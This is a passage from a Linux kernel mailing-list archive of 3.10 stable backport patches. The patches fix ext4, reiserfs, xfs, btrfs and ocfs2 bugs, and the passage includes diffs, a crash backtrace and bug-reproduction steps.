whether the inode was deleted and evicted, and this is very risky,
because i_dtime can be used for the pointer maintaining orphan inode
list, too. We need to further check whether the i_dtime is being
used for the orphan inode list even if the i_dtime is not NULL.

We found that high 16-bit fields of uid/gid of inode are unintentionally
and permanently cleared when the inode truncation is just triggered,
but not finished, and the inode metadata, whose high uid/gid bits are
cleared, is written on disk, and the sudden power-off follows that
in order.

Signed-off-by: Daeho Jeong <daeho.jeong@samsung.com>
Signed-off-by: Hobin Woo <hobin.woo@samsung.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/inode.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index 046e0e1..a187055 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -4480,14 +4480,14 @@ static int ext4_do_update_inode(handle_t *handle,
  * Fix up interoperability with old kernels. Otherwise, old inodes get
  * re-used with the upper 16 bits of the uid/gid intact
  */
-		if (!ei->i_dtime) {
+		if (ei->i_dtime && list_empty(&ei->i_orphan)) {
+			raw_inode->i_uid_high = 0;
+			raw_inode->i_gid_high = 0;
+		} else {
 			raw_inode->i_uid_high =
 				cpu_to_le16(high_16_bits(i_uid));
 			raw_inode->i_gid_high =
 				cpu_to_le16(high_16_bits(i_gid));
-		} else {
-			raw_inode->i_uid_high = 0;
-			raw_inode->i_gid_high = 0;
 		}
 	} else {
 		raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid));
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (52 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time Willy Tarreau
                   ` (164 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ross Zwisler, Theodore Ts'o, Willy Tarreau

From: Ross Zwisler <ross.zwisler@linux.intel.com>

commit cca32b7eeb4ea24fa6596650e06279ad9130af98 upstream.

Currently when doing a DAX hole punch with ext4 we fail to do a writeback.
This is because the logic around filemap_write_and_wait_range() in
ext4_punch_hole() only looks for dirty page cache pages in the radix tree,
not for dirty DAX exceptional entries.

Signed-off-by: Ross Zwisler <ross.zwisler@linux.intel.com>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/inode.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index a187055..31179ba 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -3610,7 +3610,7 @@ int ext4_can_truncate(struct inode *inode)
 }
 
 /*
- * ext4_punch_hole: punches a hole in a file by releaseing the blocks
+ * ext4_punch_hole: punches a hole in a file by releasing the blocks
  * associated with the given offset and length
  *
  * @inode:  File inode
@@ -3646,7 +3646,7 @@ int ext4_punch_hole(struct file *file, loff_t offset, loff_t length)
 	 * Write out all dirty pages to avoid race conditions
 	 * Then release them.
 	 */
-	if (mapping->nrpages && mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) {
+	if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) {
 		ret = filemap_write_and_wait_range(mapping, offset,
 						   offset + length - 1);
 		if (ret)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (53 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..." Willy Tarreau
                   ` (163 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Theodore Ts'o, Willy Tarreau

From: Theodore Ts'o <tytso@mit.edu>

commit 8cdf3372fe8368f56315e66bea9f35053c418093 upstream.

If the block size or cluster size is insane, reject the mount.  This
is important for security reasons (although we shouldn't be just
depending on this check).

Ref: http://www.securityfocus.com/archive/1/539661
Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1332506
Reported-by: Borislav Petkov <bp@alien8.de>
Reported-by: Nikolay Borisov <kernel@kyup.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/ext4.h  |  1 +
 fs/ext4/super.c | 17 ++++++++++++++++-
 2 files changed, 17 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 046e3e9..f9c938e 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -246,6 +246,7 @@ struct ext4_io_submit {
 #define	EXT4_MAX_BLOCK_SIZE		65536
 #define EXT4_MIN_BLOCK_LOG_SIZE		10
 #define EXT4_MAX_BLOCK_LOG_SIZE		16
+#define EXT4_MAX_CLUSTER_LOG_SIZE	30
 #ifdef __KERNEL__
 # define EXT4_BLOCK_SIZE(s)		((s)->s_blocksize)
 #else
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6cf69fa..faa1920 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -3537,7 +3537,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
 	if (blocksize < EXT4_MIN_BLOCK_SIZE ||
 	    blocksize > EXT4_MAX_BLOCK_SIZE) {
 		ext4_msg(sb, KERN_ERR,
-		       "Unsupported filesystem blocksize %d", blocksize);
+		       "Unsupported filesystem blocksize %d (%d log_block_size)",
+			 blocksize, le32_to_cpu(es->s_log_block_size));
+		goto failed_mount;
+	}
+	if (le32_to_cpu(es->s_log_block_size) >
+	    (EXT4_MAX_BLOCK_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+		ext4_msg(sb, KERN_ERR,
+			 "Invalid log block size: %u",
+			 le32_to_cpu(es->s_log_block_size));
 		goto failed_mount;
 	}
 
@@ -3652,6 +3660,13 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
 				 "block size (%d)", clustersize, blocksize);
 			goto failed_mount;
 		}
+		if (le32_to_cpu(es->s_log_cluster_size) >
+		    (EXT4_MAX_CLUSTER_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+			ext4_msg(sb, KERN_ERR,
+				 "Invalid log cluster size: %u",
+				 le32_to_cpu(es->s_log_cluster_size));
+			goto failed_mount;
+		}
 		sbi->s_cluster_bits = le32_to_cpu(es->s_log_cluster_size) -
 			le32_to_cpu(es->s_log_block_size);
 		sbi->s_clusters_per_group =
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..."
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (54 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() Willy Tarreau
                   ` (162 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jeff Mahoney, Arnd Bergmann, Jan Kara, Linus Torvalds,
	Andrew Morton, Willy Tarreau

From: Jeff Mahoney <jeffm@suse.com>

commit 0a11b9aae49adf1f952427ef1a1d9e793dd6ffb6 upstream.

new_insert_key only makes any sense when it's associated with a
new_insert_ptr, which is initialized to NULL and changed to a
buffer_head when we also initialize new_insert_key.  We can key off of
that to avoid the uninitialized warning.

Link: http://lkml.kernel.org/r/5eca5ffb-2155-8df2-b4a2-f162f105efed@suse.com
Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Cc: Arnd Bergmann <arnd@arndb.de>
Cc: Jan Kara <jack@suse.cz>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/reiserfs/ibalance.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/ibalance.c b/fs/reiserfs/ibalance.c
index e1978fd..58cce0c 100644
--- a/fs/reiserfs/ibalance.c
+++ b/fs/reiserfs/ibalance.c
@@ -1082,8 +1082,9 @@ int balance_internal(struct tree_balance *tb,	/* tree_balance structure
 				       insert_ptr);
 	}
 
-	memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);
 	insert_ptr[0] = new_insert_ptr;
+	if (new_insert_ptr)
+		memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);
 
 	return order;
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (55 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..." Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 158/319] xfs: fix superblock inprogress check Willy Tarreau
                   ` (161 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Mike Galbraith, Jan Kara, Willy Tarreau

From: Mike Galbraith <efault@gmx.de>

commit 420902c9d086848a7548c83e0a49021514bd71b7 upstream.

If we hold the superblock lock while calling reiserfs_quota_on_mount(), we can
deadlock our own worker - mount blocks kworker/3:2, sleeps forever more.

crash> ps|grep UN
    715      2   3  ffff880220734d30  UN   0.0       0      0  [kworker/3:2]
   9369   9341   2  ffff88021ffb7560  UN   1.3  493404 123184  Xorg
   9665   9664   3  ffff880225b92ab0  UN   0.0   47368    812  udisks-daemon
  10635  10403   3  ffff880222f22c70  UN   0.0   14904    936  mount
crash> bt ffff880220734d30
PID: 715    TASK: ffff880220734d30  CPU: 3   COMMAND: "kworker/3:2"
 #0 [ffff8802244c3c20] schedule at ffffffff8144584b
 #1 [ffff8802244c3cc8] __rt_mutex_slowlock at ffffffff814472b3
 #2 [ffff8802244c3d28] rt_mutex_slowlock at ffffffff814473f5
 #3 [ffff8802244c3dc8] reiserfs_write_lock at ffffffffa05f28fd [reiserfs]
 #4 [ffff8802244c3de8] flush_async_commits at ffffffffa05ec91d [reiserfs]
 #5 [ffff8802244c3e08] process_one_work at ffffffff81073726
 #6 [ffff8802244c3e68] worker_thread at ffffffff81073eba
 #7 [ffff8802244c3ec8] kthread at ffffffff810782e0
 #8 [ffff8802244c3f48] kernel_thread_helper at ffffffff81450064
crash> rd ffff8802244c3cc8 10
ffff8802244c3cc8:  ffffffff814472b3 ffff880222f23250   .rD.....P2."....
ffff8802244c3cd8:  0000000000000000 0000000000000286   ................
ffff8802244c3ce8:  ffff8802244c3d30 ffff880220734d80   0=L$.....Ms ....
ffff8802244c3cf8:  ffff880222e8f628 0000000000000000   (.."............
ffff8802244c3d08:  0000000000000000 0000000000000002   ................
crash> struct rt_mutex ffff880222e8f628
struct rt_mutex {
  wait_lock = {
    raw_lock = {
      slock = 65537
    }
  },
  wait_list = {
    node_list = {
      next = 0xffff8802244c3d48,
      prev = 0xffff8802244c3d48
    }
  },
  owner = 0xffff880222f22c71,
  save_state = 0
}
crash> bt 0xffff880222f22c70
PID: 10635  TASK: ffff880222f22c70  CPU: 3   COMMAND: "mount"
 #0 [ffff8802216a9868] schedule at ffffffff8144584b
 #1 [ffff8802216a9910] schedule_timeout at ffffffff81446865
 #2 [ffff8802216a99a0] wait_for_common at ffffffff81445f74
 #3 [ffff8802216a9a30] flush_work at ffffffff810712d3
 #4 [ffff8802216a9ab0] schedule_on_each_cpu at ffffffff81074463
 #5 [ffff8802216a9ae0] invalidate_bdev at ffffffff81178aba
 #6 [ffff8802216a9af0] vfs_load_quota_inode at ffffffff811a3632
 #7 [ffff8802216a9b50] dquot_quota_on_mount at ffffffff811a375c
 #8 [ffff8802216a9b80] finish_unfinished at ffffffffa05dd8b0 [reiserfs]
 #9 [ffff8802216a9cc0] reiserfs_fill_super at ffffffffa05de825 [reiserfs]
    RIP: 00007f7b9303997a  RSP: 00007ffff443c7a8  RFLAGS: 00010202
    RAX: 00000000000000a5  RBX: ffffffff8144ef12  RCX: 00007f7b932e9ee0
    RDX: 00007f7b93d9a400  RSI: 00007f7b93d9a3e0  RDI: 00007f7b93d9a3c0
    RBP: 00007f7b93d9a2c0   R8: 00007f7b93d9a550   R9: 0000000000000001
    R10: ffffffffc0ed040e  R11: 0000000000000202  R12: 000000000000040e
    R13: 0000000000000000  R14: 00000000c0ed040e  R15: 00007ffff443ca20
    ORIG_RAX: 00000000000000a5  CS: 0033  SS: 002b

Signed-off-by: Mike Galbraith <efault@gmx.de>
Acked-by: Frederic Weisbecker <fweisbec@gmail.com>
Acked-by: Mike Galbraith <mgalbraith@suse.de>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/reiserfs/super.c | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/super.c b/fs/reiserfs/super.c
index e2e202a..7ff27fa 100644
--- a/fs/reiserfs/super.c
+++ b/fs/reiserfs/super.c
@@ -184,7 +184,15 @@ static int remove_save_link_only(struct super_block *s,
 static int reiserfs_quota_on_mount(struct super_block *, int);
 #endif
 
-/* look for uncompleted unlinks and truncates and complete them */
+/*
+ * Look for uncompleted unlinks and truncates and complete them
+ *
+ * Called with superblock write locked.  If quotas are enabled, we have to
+ * release/retake lest we call dquot_quota_on_mount(), proceed to
+ * schedule_on_each_cpu() in invalidate_bdev() and deadlock waiting for the per
+ * cpu worklets to complete flush_async_commits() that in turn wait for the
+ * superblock write lock.
+ */
 static int finish_unfinished(struct super_block *s)
 {
 	INITIALIZE_PATH(path);
@@ -231,7 +239,9 @@ static int finish_unfinished(struct super_block *s)
 				quota_enabled[i] = 0;
 				continue;
 			}
+			reiserfs_write_unlock(s);
 			ret = reiserfs_quota_on_mount(s, i);
+			reiserfs_write_lock(s);
 			if (ret < 0)
 				reiserfs_warning(s, "reiserfs-2500",
 						 "cannot turn on journaled "
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 158/319] xfs: fix superblock inprogress check
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (56 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk Willy Tarreau
                   ` (160 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dave Chinner, Dave Chinner, Willy Tarreau

From: Dave Chinner <dchinner@redhat.com>

commit f3d7ebdeb2c297bd26272384e955033493ca291c upstream.

>From inspection, the superblock sb_inprogress check is done in the
verifier and triggered only for the primary superblock via a
"bp->b_bn == XFS_SB_DADDR" check.

Unfortunately, the primary superblock is an uncached buffer, and
hence it is configured by xfs_buf_read_uncached() with:

	bp->b_bn = XFS_BUF_DADDR_NULL;  /* always null for uncached buffers */

And so this check never triggers. Fix it.

Signed-off-by: Dave Chinner <dchinner@redhat.com>
Reviewed-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Dave Chinner <david@fromorbit.com>
[wt: s/xfs_sb.c/xfs_mount.c in 3.10]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/xfs/xfs_mount.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c
index e8e310c..363c4cc 100644
--- a/fs/xfs/xfs_mount.c
+++ b/fs/xfs/xfs_mount.c
@@ -689,7 +689,8 @@ xfs_sb_verify(
 	 * Only check the in progress field for the primary superblock as
 	 * mkfs.xfs doesn't clear it from secondary superblocks.
 	 */
-	return xfs_mount_validate_sb(mp, &sb, bp->b_bn == XFS_SB_DADDR,
+	return xfs_mount_validate_sb(mp, &sb,
+				     bp->b_maps[0].bm_bn == XFS_SB_DADDR,
 				     check_version);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (57 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 158/319] xfs: fix superblock inprogress check Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir Willy Tarreau
                   ` (159 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Darrick J. Wong, Dave Chinner, Willy Tarreau

From: "Darrick J. Wong" <darrick.wong@oracle.com>

commit 58d789678546d46d7bbd809dd7dab417c0f23655 upstream.

The function xfs_calc_dquots_per_chunk takes a parameter in units
of basic blocks.  The kernel seems to get the units wrong, but
userspace got 'fixed' by commenting out the unnecessary conversion.
Fix both.

Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Reviewed-by: Eric Sandeen <sandeen@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/xfs/xfs_dquot.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c
index bac3e16..e59f309 100644
--- a/fs/xfs/xfs_dquot.c
+++ b/fs/xfs/xfs_dquot.c
@@ -309,8 +309,7 @@ xfs_dquot_buf_verify_crc(
 	if (mp->m_quotainfo)
 		ndquots = mp->m_quotainfo->qi_dqperchunk;
 	else
-		ndquots = xfs_qm_calc_dquots_per_chunk(mp,
-					XFS_BB_TO_FSB(mp, bp->b_length));
+		ndquots = xfs_qm_calc_dquots_per_chunk(mp, bp->b_length);
 
 	for (i = 0; i < ndquots; i++, d++) {
 		if (!xfs_verify_cksum((char *)d, sizeof(struct xfs_dqblk),
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (58 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration Willy Tarreau
                   ` (158 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jeff Mahoney, Chris Mason, Willy Tarreau

From: Jeff Mahoney <jeffm@suse.com>

commit 325c50e3cebb9208009083e841550f98a863bfa0 upstream.

If the subvol/snapshot create/destroy ioctls are passed a regular file
with execute permissions set, we'll eventually Oops while trying to do
inode->i_op->lookup via lookup_one_len.

This patch ensures that the file descriptor refers to a directory.

Fixes: cb8e70901d (Btrfs: Fix subvolume creation locking rules)
Fixes: 76dda93c6a (Btrfs: add snapshot/subvolume destroy ioctl)
Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/btrfs/ioctl.c | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
index dbefa6c..296cc1b 100644
--- a/fs/btrfs/ioctl.c
+++ b/fs/btrfs/ioctl.c
@@ -1496,6 +1496,9 @@ static noinline int btrfs_ioctl_snap_create_transid(struct file *file,
 	int namelen;
 	int ret = 0;
 
+	if (!S_ISDIR(file_inode(file)->i_mode))
+		return -ENOTDIR;
+
 	ret = mnt_want_write_file(file);
 	if (ret)
 		goto out;
@@ -1553,6 +1556,9 @@ static noinline int btrfs_ioctl_snap_create(struct file *file,
 	struct btrfs_ioctl_vol_args *vol_args;
 	int ret;
 
+	if (!S_ISDIR(file_inode(file)->i_mode))
+		return -ENOTDIR;
+
 	vol_args = memdup_user(arg, sizeof(*vol_args));
 	if (IS_ERR(vol_args))
 		return PTR_ERR(vol_args);
@@ -1576,6 +1582,9 @@ static noinline int btrfs_ioctl_snap_create_v2(struct file *file,
 	bool readonly = false;
 	struct btrfs_qgroup_inherit *inherit = NULL;
 
+	if (!S_ISDIR(file_inode(file)->i_mode))
+		return -ENOTDIR;
+
 	vol_args = memdup_user(arg, sizeof(*vol_args));
 	if (IS_ERR(vol_args))
 		return PTR_ERR(vol_args);
@@ -2081,6 +2090,9 @@ static noinline int btrfs_ioctl_snap_destroy(struct file *file,
 	int ret;
 	int err = 0;
 
+	if (!S_ISDIR(dir->i_mode))
+		return -ENOTDIR;
+
 	vol_args = memdup_user(arg, sizeof(*vol_args));
 	if (IS_ERR(vol_args))
 		return PTR_ERR(vol_args);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (59 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() Willy Tarreau
                   ` (157 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Joseph Qi, Jun Piao, Mark Fasheh, Joel Becker, Junxiao Bi,
	Andrew Morton, Linus Torvalds, Willy Tarreau

From: Joseph Qi <joseph.qi@huawei.com>

commit e6f0c6e6170fec175fe676495f29029aecdf486c upstream.

Commit ac7cf246dfdb ("ocfs2/dlm: fix race between convert and recovery")
checks if lockres master has changed to identify whether new master has
finished recovery or not.  This will introduce a race that right after
old master does umount ( means master will change), a new convert
request comes.

In this case, it will reset lockres state to DLM_RECOVERING and then
retry convert, and then fail with lockres->l_action being set to
OCFS2_AST_INVALID, which will cause inconsistent lock level between
ocfs2 and dlm, and then finally BUG.

Since dlm recovery will clear lock->convert_pending in
dlm_move_lockres_to_recovery_list, we can use it to correctly identify
the race case between convert and recovery.  So fix it.

Fixes: ac7cf246dfdb ("ocfs2/dlm: fix race between convert and recovery")
Link: http://lkml.kernel.org/r/57CE1569.8010704@huawei.com
Signed-off-by: Joseph Qi <joseph.qi@huawei.com>
Signed-off-by: Jun Piao <piaojun@huawei.com>
Cc: Mark Fasheh <mfasheh@versity.com>
Cc: Joel Becker <jlbec@evilplan.org>
Cc: Junxiao Bi <junxiao.bi@oracle.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ocfs2/dlm/dlmconvert.c | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/fs/ocfs2/dlm/dlmconvert.c b/fs/ocfs2/dlm/dlmconvert.c
index f65bdcf..6d97883 100644
--- a/fs/ocfs2/dlm/dlmconvert.c
+++ b/fs/ocfs2/dlm/dlmconvert.c
@@ -265,7 +265,6 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm,
 				  struct dlm_lock *lock, int flags, int type)
 {
 	enum dlm_status status;
-	u8 old_owner = res->owner;
 
 	mlog(0, "type=%d, convert_type=%d, busy=%d\n", lock->ml.type,
 	     lock->ml.convert_type, res->state & DLM_LOCK_RES_IN_PROGRESS);
@@ -332,7 +331,6 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm,
 
 	spin_lock(&res->spinlock);
 	res->state &= ~DLM_LOCK_RES_IN_PROGRESS;
-	lock->convert_pending = 0;
 	/* if it failed, move it back to granted queue.
 	 * if master returns DLM_NORMAL and then down before sending ast,
 	 * it may have already been moved to granted queue, reset to
@@ -341,12 +339,14 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm,
 		if (status != DLM_NOTQUEUED)
 			dlm_error(status);
 		dlm_revert_pending_convert(res, lock);
-	} else if ((res->state & DLM_LOCK_RES_RECOVERING) ||
-			(old_owner != res->owner)) {
-		mlog(0, "res %.*s is in recovering or has been recovered.\n",
-				res->lockname.len, res->lockname.name);
+	} else if (!lock->convert_pending) {
+		mlog(0, "%s: res %.*s, owner died and lock has been moved back "
+				"to granted list, retry convert.\n",
+				dlm->name, res->lockname.len, res->lockname.name);
 		status = DLM_RECOVERING;
 	}
+
+	lock->convert_pending = 0;
 bail:
 	spin_unlock(&res->spinlock);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (60 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps() Willy Tarreau
                   ` (156 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ashish Samant, Mark Fasheh, Joel Becker, Junxiao Bi, Joseph Qi,
	Eric Ren, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Ashish Samant <ashish.samant@oracle.com>

commit d21c353d5e99c56cdd5b5c1183ffbcaf23b8b960 upstream.

If we punch a hole on a reflink such that following conditions are met:

1. start offset is on a cluster boundary
2. end offset is not on a cluster boundary
3. (end offset is somewhere in another extent) or
   (hole range > MAX_CONTIG_BYTES(1MB)),

we dont COW the first cluster starting at the start offset.  But in this
case, we were wrongly passing this cluster to
ocfs2_zero_range_for_truncate() to zero out.  This will modify the
cluster in place and zero it in the source too.

Fix this by skipping this cluster in such a scenario.

To reproduce:

1. Create a random file of say 10 MB
     xfs_io -c 'pwrite -b 4k 0 10M' -f 10MBfile
2. Reflink  it
     reflink -f 10MBfile reflnktest
3. Punch a hole at starting at cluster boundary  with range greater that
1MB. You can also use a range that will put the end offset in another
extent.
     fallocate -p -o 0 -l 1048615 reflnktest
4. sync
5. Check the  first cluster in the source file. (It will be zeroed out).
    dd if=10MBfile iflag=direct bs=<cluster size> count=1 | hexdump -C

Link: http://lkml.kernel.org/r/1470957147-14185-1-git-send-email-ashish.samant@oracle.com
Signed-off-by: Ashish Samant <ashish.samant@oracle.com>
Reported-by: Saar Maoz <saar.maoz@oracle.com>
Reviewed-by: Srinivas Eeda <srinivas.eeda@oracle.com>
Cc: Mark Fasheh <mfasheh@versity.com>
Cc: Joel Becker <jlbec@evilplan.org>
Cc: Junxiao Bi <junxiao.bi@oracle.com>
Cc: Joseph Qi <joseph.qi@huawei.com>
Cc: Eric Ren <zren@suse.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
